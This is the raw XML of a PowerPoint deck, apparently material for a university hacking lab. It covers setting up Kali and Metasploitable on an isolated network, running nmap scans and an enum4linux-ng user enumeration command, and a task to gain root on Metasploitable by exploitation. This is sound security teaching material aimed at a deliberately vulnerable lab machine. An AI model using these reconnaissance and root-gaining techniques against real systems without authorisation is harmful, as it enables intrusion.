              <a:rPr lang="en-US" b="1"/>
              <a:t>enum4linux-ng –U [IP]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9DFDA-5582-4E8C-A70E-A8D45A9C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53" y="1746530"/>
            <a:ext cx="3253341" cy="32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8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00E92-7708-42B5-A176-511CE23E7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Enum4Linux-ng results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6F1C2-5E6D-4D79-89A9-2D8D5ECEDBCA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3739019" y="4321829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Juicy information worth investigating...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t>Try using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" err="1"/>
              <a:t>smbmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t> tool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828F41-DB64-4FC4-90C8-39CC79A21318}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="4272816" y="3371070"/>
            <a:ext cx="345796" cy="1022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D3A10BF-5F34-45AB-913A-245F0236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5" y="896873"/>
            <a:ext cx="3185458" cy="3892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03BE7B-7AF8-4C9D-9972-013F592EC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50"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4768455" y="821671"/>
            <a:ext cx="3649230" cy="35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2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8209A-3854-49DB-9448-DEBA29151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DCDB2-CBFA-43BA-A7A4-B62B3BFEA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anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>We will use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>Metasploitable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> again</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Set both to either Internal Network, NAT, or bridged if you are on your own safe network</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>You will not need internet access but the VM must be able to communicate</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Make sure it is deployed correctly and online</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>You can ping metasploitable from Kali</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Networking</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>Kali: 		10.10.0.10</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Metasploitable:	10.10.0.20</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Netmask:		255.255.255.0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55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FA513-86E8-4809-BA34-CACDAAFEE7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Metasploitable - Get Root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20B5B-E6B2-4523-AEF2-003B6159A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Practice and try to get a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>root prompt on the machine. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>You must try to get root through exploitation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>OPIONAL - Share how you did it in the #labs channel </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>You may attack Metasploitable in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>any way </a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Assume you have physical access to the machine too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4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Placeholder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7"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="-3175" y="-1588"/>
            <a:ext cx="4483100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Recon and Scanning</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="14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Recon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Start by getting an understanding of our network</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Perform an nmap scan of the 10.10.0.0 network</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>No name resolution</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>No port scanning, only host discovery</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Perform another scan of only the online hosts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>No name resolution</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Skip host probing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>OS detection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Version Scanning</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Default ports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What are the hosts and IP addresses?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1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8E1BC0-85CF-48E4-9E9B-2B86E680A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4711" y="1016836"/>
            <a:ext cx="461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SPOILER</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2507460228"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/theme/theme1.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="nyu_labs_h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u_labs_hack" id="{622526B1-0E66-46D2-97E9-9B9E513BAC66}" vid="{60DC1E77-B4F8-4238-B768-89B7FCA364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2977</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (16:9)</PresentationFormat>
  <Paragraphs>644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Noto Sans Symbols</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>nyu_labs_hack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Peter Klabe</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2013-09-03T13:03:01Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-02-28T01:51:48Z</dcterms:modified>
</cp:coreProperties>
</file>